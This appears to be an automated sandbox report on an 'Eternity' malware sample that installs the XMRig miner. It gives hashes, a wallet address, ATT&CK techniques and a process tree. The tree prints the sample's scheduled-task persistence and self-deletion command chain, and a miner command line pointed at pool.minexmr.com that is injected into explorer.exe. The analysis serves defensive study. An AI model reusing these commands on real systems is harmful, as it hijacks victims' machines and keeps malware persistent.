eternity | 82d4c31b741a633f3eaaf8f6c361b99e5de14060d26457ac1be57bb0f8a1d3bf

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
13-05-2023 20:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
Size

2.1MB
MD5

d5737f563015ca9df92bf17c6636db42
SHA1

957099807b7ab2e38d583f84fb7059711feec61f
SHA256

a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9
SHA512

d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518
SSDEEP

49152:kzuzgsK8XCwKyblc81KsH7FtfcaSPL/e6988MKMTq3xJTaUbEyi:NzgEywKybm81KQ7F9caSPi69893Oj81

Score

10^/10

eternity xmrig miner

Malware Config

Extracted

Family

eternity

Wallets

49vkUmVaigPGUsSL7xMRTxHbf38TkAMKFVN57A17sxUujLNgmrKi7bFcwb73uRWepASSZJPEWf1Kn81nWdHKDhEnAANFvmW

Signatures

Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
eternity
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral8/memory/3920-141-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral8/memory/3920-144-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral8/memory/3920-142-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral8/memory/3920-146-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral8/memory/3920-147-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral8/memory/3920-148-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral8/memory/3920-149-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral8/memory/3920-151-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral8/memory/3920-150-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral8/memory/3920-153-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

Executes dropped EXE 2 IoCs

pid	Process
1456	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
5052	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1456 set thread context of 3920	1456	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	92

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
816	schtasks.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2296	PING.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	3920	explorer.exe
Token: SeLockMemoryPrivilege	3920	explorer.exe

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 4192 wrote to memory of 2100	4192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	84
PID 4192 wrote to memory of 2100	4192	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	84
PID 2100 wrote to memory of 1048	2100	cmd.exe	86
PID 2100 wrote to memory of 1048	2100	cmd.exe	86
PID 2100 wrote to memory of 2296	2100	cmd.exe	87
PID 2100 wrote to memory of 2296	2100	cmd.exe	87
PID 2100 wrote to memory of 816	2100	cmd.exe	88
PID 2100 wrote to memory of 816	2100	cmd.exe	88
PID 2100 wrote to memory of 1456	2100	cmd.exe	89
PID 2100 wrote to memory of 1456	2100	cmd.exe	89
PID 1456 wrote to memory of 3920	1456	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	92
PID 1456 wrote to memory of 3920	1456	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	92
PID 1456 wrote to memory of 3920	1456	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	92
PID 1456 wrote to memory of 3920	1456	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	92
PID 1456 wrote to memory of 3920	1456	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	92
PID 1456 wrote to memory of 3920	1456	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	92
PID 1456 wrote to memory of 3920	1456	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	92
PID 1456 wrote to memory of 3920	1456	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	92
PID 1456 wrote to memory of 3920	1456	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	92
PID 1456 wrote to memory of 3920	1456	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	92
PID 1456 wrote to memory of 3920	1456	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	92
PID 1456 wrote to memory of 3920	1456	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	92
PID 1456 wrote to memory of 3920	1456	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	92
PID 1456 wrote to memory of 3920	1456	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	92
PID 1456 wrote to memory of 3920	1456	a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe	92

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
"C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4192
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2100
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:1048
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:2296
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:816
- - C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
    "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:1456
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe -a cryptonight -o pool.minexmr.com:4444 -u 49vkUmVaigPGUsSL7xMRTxHbf38TkAMKFVN57A17sxUujLNgmrKi7bFcwb73uRWepASSZJPEWf1Kn81nWdHKDhEnAANFvmW.Admin_HCIDPJOT -p x --max-cpu-usage=30 --donate-level=1
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3920

C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
1⤵
- Executes dropped EXE
PID:5052

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe.log

Filesize
425B

MD5
fff5cbccb6b31b40f834b8f4778a779a

SHA1
899ed0377e89f1ed434cfeecc5bc0163ebdf0454

SHA256
b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76

SHA512
1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9

Download Submit
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

Filesize
2.1MB

MD5
d5737f563015ca9df92bf17c6636db42

SHA1
957099807b7ab2e38d583f84fb7059711feec61f

SHA256
a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9

SHA512
d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518

Download Submit
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

Filesize
2.1MB

MD5
d5737f563015ca9df92bf17c6636db42

SHA1
957099807b7ab2e38d583f84fb7059711feec61f

SHA256
a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9

SHA512
d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518

Download Submit
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

Filesize
2.1MB

MD5
d5737f563015ca9df92bf17c6636db42

SHA1
957099807b7ab2e38d583f84fb7059711feec61f

SHA256
a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9

SHA512
d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518

Download Submit
memory/1456-152-0x000001C93CA70000-0x000001C93CA80000-memory.dmp

Filesize
64KB

Download
memory/1456-143-0x000001C93CA70000-0x000001C93CA80000-memory.dmp

Filesize
64KB

Download
memory/3920-148-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/3920-151-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/3920-145-0x0000000001EF0000-0x0000000001F10000-memory.dmp

Filesize
128KB

Download
memory/3920-146-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/3920-147-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/3920-144-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/3920-149-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/3920-142-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/3920-150-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/3920-141-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/3920-153-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/4192-133-0x00000292C0710000-0x00000292C0926000-memory.dmp

Filesize
2.1MB

Download
memory/5052-155-0x0000019C77F50000-0x0000019C77F60000-memory.dmp

Filesize
64KB

Download
memory/5052-156-0x0000019C77F50000-0x0000019C77F60000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads